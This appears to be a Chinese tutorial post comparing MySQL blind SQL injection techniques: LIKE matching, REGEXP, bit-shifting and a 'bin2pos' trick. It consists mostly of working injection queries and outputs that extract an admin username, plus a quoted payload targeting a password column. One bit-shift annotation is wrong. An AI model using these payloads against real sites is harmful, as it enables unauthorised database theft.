-> 盲注方法探究
1.二分法
这个不多说,大家都懂滴,啊D就是用的这种方法
速度: log2(N)
2.模糊匹配法
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'a%';
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'adn%';
Empty set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'adm%';
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'admin';
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
====> name = admin
3.正则匹配法
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[0-9]' ;
Empty set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[a-z]' ;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[a-h]' ;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[a-a]' ;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
======> name[0] = a
4.位推法
a(10) = 97
a(2) = 01100001
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>7)=0;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
====> 01100001 右移7位后 成为 00000000
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>6)=0;
Empty set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>6)=1;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
====> 01100001 右移6位后 成为 00000001
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>5)=2;
Empty set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>5)=3;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
====> 01100001 右移5位后 成为 00000011
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>4)=6;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>4)=7;
Empty set (0.00 sec)
====> 01100001 右移4位后 成为 00000110
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>3)=12;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>3)=13;
Empty set (0.00 sec)
====> 01100001 右移3位后 成为 00001100
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>2)=24;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>2)=25;
Empty set (0.00 sec)
====> 01100001 右移2位后 成为 00011000
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name f
rom ylmf_admin_user limit 1),1,1))>>1)=48;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>1)=49;
Empty set (0.00 sec)
====> 01100001 右移1位后 成为 00110000
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>0)=96;
Empty set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>0)=97;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
====> 01100001 右移0位后 成为 00110001
====> name[0] = a
速度:固定为7步了
5.bin2pos
前面那些都挺容易理解,而且大部分都知道,最后这个是我今天才看到的,挺奇葩的,名字我也不知道该咋个翻译。。。而且我也不确定我想的和作者想的一样
我就按照我的思路说吧。
作者给的语句:
IF((@a:=MID(BIN(POSITION(MID((SELECT password FROM users WHERE id=2 LIMIT 1),1,1)IN(CHAR(48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,70))),1,1))!=space(0),2-@a,0/0)
我整理的语句:
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),1,1),"abcdefghijklmno")),1,1),@i,0);
locate 和 position 功能是相近的,我就以locate来用了
(select name from ylmf_admin_user limit 1) 是我们的重点查询语句
然后由mid((select name from ylmf_admin_user limit 1),1,1)来截取查询结果的第1个字符
然后由(locate(mid((select name from ylmf_admin_user limit 1),1,1),"abcdefghijklmno")将查询结果映射到字符串abcdefghijklmno中,判断mid的结果所在位置,如a就是1
然后由bin()来把结果转换为二进制
然后由mid()来截取字符
然后赋值给@i
最后由if(expr, res1, res2)语句来判断,我爸res1设为@i是因为@i的结果只有0,1这两种结果
mysql> select site_url from ylmf_links where id=40 and if(@i:=length(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")))>0,1,0);
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
====> (mid((select name from ylmf_admin_user limit 1),2,1) 有查到数据
mysql> select site_url from ylmf_links where id=40 and if(@i:=length(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")))>2,1,0);
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and if(@i:=length(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")))>3,1,0);
Empty set (0.00 sec)
====> bin结果 共3位
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")),1,1),@i,0);
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
====> bin结果的 第1位 1
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")),2,1),@i,0);
Empty set (0.00 sec)
====> bin结果的 第2位 0
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")),3,1),@i,0);
Empty set (0.00 sec)
====> bin结果的 第3位 0 ====> bin结果 100 即 d
我为什么要映射到abcdefghijklmno上呢?因为abcdefghijklmno长度为15,bin(15)=1111,这样好缩短bin结果长度的时间,如果(mid((select name from ylmf_admin_user limit 1),2,1)没有数据,你由确定语句正确就替换abcdefghijklmno为别的,如 ABCDEFGHIJKLMNO
扫一扫
100
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
